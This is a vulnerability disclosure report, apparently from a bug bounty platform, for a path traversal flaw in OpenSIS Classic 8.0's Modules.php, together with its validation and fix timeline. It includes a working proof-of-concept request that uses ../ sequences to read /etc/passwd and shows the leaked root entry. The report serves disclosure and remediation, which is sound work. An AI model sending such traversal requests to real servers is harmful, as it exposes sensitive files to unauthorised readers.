Path Traversal in os4ed/opensis-classic


Reported on

Aug 28th 2021

✍️ Description

The module.php modname parameter in OpenSIS 8.0 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.;

🕵️‍♂️ Proof of Concept

//  Modules.php
GET /Modules.php?modname=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1 302 Found
Location: index.php

                <!-- Main content -->
                <div class="content-wrapper"><div id='content' name='content' class='clearfix'><div id='update_panel'><div id='divErr' class="text-left text-danger"></div><DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100;"></DIV>root:x:0:0:root:/root:/usr/bin/zsh
</div><div id='cal' style='position:absolute;'></div></div>
                <!-- /main content -->

💥 Impact

Enables an attacker to access sensitive files

2 years ago


Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back 2 years ago
We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. 2 years ago
a year ago


@admin Good Day - This was fixed under -- Would you please be able to manually validate? Thank you

a year ago


Asked the maintainer to confirm this and your other report :)

Pavlos validated this vulnerability a year ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 8.0 with commit a2d617 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Modules.php#L954-L976 has been validated
Pavlos published this vulnerability a year ago
to join this conversation